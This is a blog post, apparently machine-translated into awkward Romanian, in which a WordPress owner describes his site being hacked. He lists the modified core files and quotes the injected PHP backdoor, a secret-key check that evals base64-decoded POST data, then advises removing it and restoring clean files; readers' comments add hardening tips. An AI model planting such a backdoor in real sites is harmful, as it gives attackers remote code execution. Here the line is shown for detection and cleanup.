Din nou, am tocat

Adăugată pe site de: Dexter Panganiban

Sunteţi invitat să îmi GRATUIT RSS Feeds sau s-ar putea să Abonează-te la mine prin e-mail pentru mai noi informaţii în acest site.

Ultima ianuarie WordPress.net.in a injectat coduri de la mine Wordpress imagini în care următoarele WordPress fişiere a fost injectat cu numere pentru SQL

  • wp-admin/admin.php
  • wp-admin/index.php
  • wp-includes/wp-db.php
  • wp-includes/pluggable.php
  • wp-includes/gettext.php
  • wp-includes/default-filters.php

Apoi, din nou. Site-ul meu s-au tocat, dar în acest moment, nu este complet tocat, deoarece am fost în stare pentru a verifica unele fişiere de WordPress care a fost modificat. Ea poate fi uşor Notă Dacă utilizaţi Windows Live Writer. Dacă utilizaţi Windows Live scriitor şi brusc te întâlni "blog de eroare de la server-eroare de server-32700 Eroare de analiză a apărut, nu de bine format"

Am vazut ca unii şir, după cum urmează:

<? php if ($ _GET [ 'aee8d2759ea2c769']==" e7d557fe37ae8fd6 ") (eval (base64_decode ($ _POST [' fisier'])); exit;)?>

Acest şir nu ar trebui să fie instalat pe oricare dintre fişierele WordPress menţionate mai sus şi trebuie să fie şterse. Cea mai simplă metodă de a stabili o pe asta este de a înlocui fişierele de mai sus mentionate de originalul fişierele de instalare de WordPress care ar putea fi descarcat de la site-ul lor. Este bine că i-am dat o copie a acestor fisiere in calculatorul meu. Pentru că a tocat s-ar putea intampla din nou.

Din nou, am mulţumesc gordon.dewis.ca pentru post cu privire la această problemă. suplimentare rezultat bun informaţii de la alte site-ul

Index.php meu principal nu a fost încă tocat. Am crezut de hacking nu este încă finalizat. Data viitoare când veţi vedea o eroare de la Windows Live Writer. Verificaţi-vă fişierele de instalare WordPress.

Am făcut Pentru a face listă de control.

  1. Am nevoie pentru a instala. Htaccess parola, poate că cineva ar dori să facă acest lucru în post :) sau voi doar sa de căutare prin intermediul Google.
  2. De cercetare pentru mai mult posibil de securitate fixa pentru blog-ul meu.
  3. Aveţi nevoie de actualizare pentru a-mi plug-in-uri :)

Este bine ca sunt, folosind Windows Live Writer. Deci, data viitoare când vă Authoring Tools face unele problemă încercaţi să căutaţi imediat la Google a problemei cu care-l rapoarte. BTW am nevoie pentru a studia acest articol pe WordPress Codex.

Email This Post Email this post

; Arhivat in Blogging, sfaturi şi trucuri, Wordpress

Dacă sunteţi nou aici, şi pe care doriţi să fie actualizat la data de lucruri se întâmplă pe acest site, pentru a va abona la Încercaţi meu GRATUIT RSS Feeds şi Abonează-te la mine prin e-mail


Înainte post din categoria: Ai nevoie de a furniza toate informaţiile? »

«Previous post din categoria: Link Love # 11: culegerea de informaţii de la Blogosphere


Trackback Link-uri

del.icio.us | digg it | Furl | Ma.gnolia | Maple.nu | Netscape | reddit | Scuttle | Umbre | Simpy | Spurl | StumbleUpon | Wink | Yahoo MyWeb |

Permalink: Am tocat Din nou


Înscrieţi-vă pentru a începe să accepte PayPal si card de credit plăţile instantaneu.

Comentarii

Unul Răspuns la spre "Am tocat din nou"

  1. KarloPinoyBlogero pe 24 martie 2008 10:58

    Stii ce, cred că motivul pentru blog-ul dvs. este tocat de des se întâmplă pentru că vă dezvălui de plugin-uri pe care le folosiţi pe blog-ul. Wordpress plugin-uri sunt cele pe care o face un blog vulnerabile la atacuri.

    Îmi pare că ghicitul hackeri căutat doar pentru un plug-in WordPress care are unele probleme de securitate şi a aterizat pe blog-ul.

    KarloPinoyBlogero de ultima blog post .. A Pinoy termen de cuvântul "Blog"?

    [Reply]


  2. Dexter pe 24 martie 2008 11:24

    Multumesc pentru sfaturi Karlo .. De acum nu voi dezvălui de plug-in-uri care sunt utilizaţi .. :)
    Dexter's ultima blog post .. LG a introdus avansată IPS (In-Panel-Switching) de frământare bord

    [Reply]


  3. snoob pe 24 martie 2008 12:27

    Amintiţi-vă să chmod fişierele de care aveţi nevoie protejate.

    snoob de ultima blog post ..? Eu chiar vreau să câştigaţi bani on-line, ce trebuie să fac??

    [Reply]


  4. KarloPinoyBlogero pe 24 martie 2008 12:32

    Nu o problemă!

    KarloPinoyBlogero de ultima blog post .. A Pinoy termen de cuvântul "Blog"?

    [Reply]


  5. Dexter pe 24 martie 2008 1:24

    @ Snoob

    orice instrucţiuni despre cum să o fac.

    Dexter's ultima blog post .. LG a introdus avansată IPS (In-Panel-Switching) de frământare bord

    [Reply]


  6. Gordon pe 24 martie 2008 4:20

    @ Dexter: Check out Codex (http://codex.wordpress.org/Hardening_WordPress). :)
    Gordon e ultima blog post .. săritor vultur ray ucide luntraş

    [Reply]


  7. V_RocKs pe 24 martie 2008 5:15

    Aceasta este o prostie!

    Am ambele 2.3.3 şi 2.0.11 bloguri si toate sunt tocat achiziţie în acest mod.

    Acest lucru a fost întâmplă din octombrie 2007 şi s-au diferite versiuni noi de atunci, fără a fi abordat această problemă şi nu de intrare de la autori de WordPress!

    Asta este doar o veste proastă tot ...

    [Reply]


  8. Dexter pe 24 martie 2008 5:22

    @ V_RocKs

    Orice succes pe prevenirea acestui hack .. ?

    Dexter's ultima blog post .. LG a introdus avansată IPS (In-Panel-Switching) de frământare bord

    [Reply]


1 pingsLinks Pentru această postare

  1. Cum sa blog? My Top 10 Blogging Sfaturi: Tech la îndemână dot Net | filipinez, Blogging, SEO & Sfaturi de la 9 iunie 2008 12:26

    [...] Face un foarte puternic Parola pentru a evita sa fie tocat. [...]


Plecare un Reply




Aboneaza-te la RSS feed

Aboneaza-te la RSS feed

Introduceţi adresa dvs. de email:

Alte Tema